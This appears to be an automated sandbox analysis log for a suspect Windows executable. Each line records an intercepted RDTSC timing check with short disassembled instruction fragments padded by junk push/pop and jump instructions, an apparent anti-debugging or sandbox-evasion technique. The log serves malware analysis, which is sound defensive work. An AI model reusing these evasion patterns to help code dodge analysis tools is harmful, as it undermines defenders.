Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 533C1D second address: 533C34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F0FE0B8ED36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0FE0B8ED3Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 533C34 second address: 533C39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 533D6D second address: 533D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 533ED4 second address: 533ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53419C second address: 5341A6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0FE0B8ED36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5341A6 second address: 5341B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007F0FE14B0506h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5342FD second address: 534301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 534301 second address: 53431F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0FE14B0506h 0x00000008 jnl 00007F0FE14B0506h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnc 00007F0FE14B050Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53431F second address: 534323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53446D second address: 534482 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0511h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 534482 second address: 534488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 534488 second address: 534494 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 534494 second address: 5344A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0FE0B8ED36h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F0FE0B8ED36h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5344A9 second address: 5344AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53464D second address: 53468C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0FE0B8ED36h 0x0000000a jl 00007F0FE0B8ED36h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F0FE0B8ED51h 0x0000001c jmp 00007F0FE0B8ED45h 0x00000021 js 00007F0FE0B8ED36h 0x00000027 push eax 0x00000028 push edx 0x00000029 je 00007F0FE0B8ED36h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53468C second address: 5346A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0512h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 534809 second address: 53480D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 534D7D second address: 534D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE14B0510h 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 534D94 second address: 534D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 534D99 second address: 534DD7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0FE14B0508h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F0FE14B0518h 0x00000012 js 00007F0FE14B0506h 0x00000018 jl 00007F0FE14B0506h 0x0000001e popad 0x0000001f jng 00007F0FE14B050Ah 0x00000025 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 534DD7 second address: 534DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0FE0B8ED48h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 534DF3 second address: 534DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 534DF7 second address: 534E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE0B8ED42h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jl 00007F0FE0B8ED36h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 534E1A second address: 534E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53811B second address: 538126 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F0FE0B8ED36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 538126 second address: 538140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jnc 00007F0FE14B050Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 538140 second address: 538153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0FE0B8ED36h 0x0000000a js 00007F0FE0B8ED36h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53ABC4 second address: 53ABC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53ABC8 second address: 53ABD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53ABD0 second address: 53ABDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F0FE14B0506h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5416FF second address: 541703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 541703 second address: 541707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 541707 second address: 541715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 541715 second address: 541719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 541719 second address: 54172A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE0B8ED3Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 54172A second address: 541744 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0515h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 540050 second address: 540077 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F0FE0B8ED36h 0x00000009 jnl 00007F0FE0B8ED36h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F0FE0B8ED42h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 540077 second address: 54009A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jo 00007F0FE14B0513h 0x0000000e jmp 00007F0FE14B050Dh 0x00000013 ja 00007F0FE14B050Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 54063C second address: 540675 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0FE0B8ED42h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007F0FE0B8ED48h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 540675 second address: 54069A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0FE14B0506h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0FE14B0519h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4F8B10 second address: 4F8B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0FE0B8ED36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 540A88 second address: 540A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5446F3 second address: 544710 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0FE0B8ED36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007F0FE0B8ED36h 0x00000015 pop ecx 0x00000016 pop esi 0x00000017 push ecx 0x00000018 push ebx 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 544710 second address: 54471D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F0FE14B0506h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 54471D second address: 544721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 543E60 second address: 543E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0FE14B0506h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 543E6A second address: 543E70 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 543E70 second address: 543E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 543E7A second address: 543E91 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0FE0B8ED36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d jo 00007F0FE0B8ED56h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 543E91 second address: 543E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0FE14B0506h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 544148 second address: 54414E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 54414E second address: 544154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5493E9 second address: 5493F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED3Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5493F7 second address: 549409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0FE14B050Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 54887D second address: 548885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 548885 second address: 5488A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0FE14B0517h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5488A5 second address: 5488CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F0FE0B8ED3Eh 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F0FE0B8ED3Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5488CE second address: 5488E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0511h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5488E8 second address: 548904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE0B8ED42h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 548A6B second address: 548ABC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F0FE14B0516h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F0FE14B0518h 0x00000011 jo 00007F0FE14B0506h 0x00000017 pop ebx 0x00000018 pop edi 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0FE14B0511h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 548C49 second address: 548C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 548E2B second address: 548E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 551505 second address: 55150B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 55150B second address: 551511 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 551511 second address: 551517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 551517 second address: 551521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0FE14B0506h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 551521 second address: 551525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 54FAAA second address: 54FABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B050Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 54FABC second address: 54FAC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 54FAC9 second address: 54FACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 54FACF second address: 54FAD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 54FAD3 second address: 54FAEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE14B0513h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 55033C second address: 55035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE0B8ED49h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 55035C second address: 550380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0FE14B0506h 0x0000000a jmp 00007F0FE14B0513h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 550380 second address: 5503AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE0B8ED3Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0FE0B8ED47h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 55063C second address: 550640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 550640 second address: 55065C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0FE0B8ED36h 0x00000008 jmp 00007F0FE0B8ED42h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 550BEB second address: 550BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 550BEF second address: 550BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 555C5A second address: 555C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0FE14B0506h 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0FE14B0517h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0FE14B0512h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 555C93 second address: 555CAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED42h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 555CAB second address: 555CB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 555CB1 second address: 555CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0FE0B8ED36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 558CFC second address: 558D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 558D00 second address: 558D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 558D04 second address: 558D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 558D0A second address: 558D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 558D10 second address: 558D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 55901E second address: 559024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 559024 second address: 559042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0514h 0x00000007 jng 00007F0FE14B0506h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 559042 second address: 55904E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0FE0B8ED36h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 55904E second address: 559054 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 559054 second address: 55905D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5591D2 second address: 5591D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 55933A second address: 559359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F0FE0B8ED36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0FE0B8ED43h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5594DF second address: 5594E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
